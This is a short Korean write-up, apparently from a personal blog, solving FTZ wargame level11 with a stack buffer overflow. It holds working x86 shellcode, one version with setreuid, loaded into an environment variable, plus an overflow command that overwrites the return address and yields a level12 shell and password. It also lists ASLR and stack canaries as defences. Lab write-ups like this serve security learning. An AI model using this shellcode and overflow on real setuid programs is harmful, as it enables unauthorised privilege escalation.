보안_기타/ftz
level11
정지홍
2024. 8. 2. 20:01
우선 쉘 코드를 준비
이는 /bin/sh을 실행한다.
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80
한번 환경 변수를 등록해본다
[level11@ftz level11]$ export env=$(python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"')
[level11@ftz level11]$ ./attackme `python -c 'print "A"*268 + "\x54\xff\xff\xbf"'`
sh-2.05b$ id
uid=3092(level12) gid=3091(level11) groups=3091(level11)
sh-2.05b$ id -u
3092
sh-2.05b$ id -g
3091
sh-2.05b$ whoami
level12
sh-2.05b$ my-pass
TERM environment variable not set.
Level12 Password is "it is like this".
위의 방법을 막으려면?
- ASLR
- stack canaires